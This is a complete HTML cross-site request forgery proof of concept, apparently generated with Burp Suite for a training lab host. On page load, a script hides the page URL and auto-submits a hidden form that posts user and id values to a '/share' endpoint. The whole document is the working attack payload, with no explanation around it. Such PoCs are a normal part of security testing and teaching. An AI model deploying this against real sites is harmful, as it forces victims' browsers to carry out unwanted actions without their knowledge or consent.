<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="https://ptl-d2587d7a3ad3-cc7b5fe04a33.libcurl.me/share" method="POST">
      <input type="hidden" name="user" value="user1" />
      <input type="hidden" name="id" value="0" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
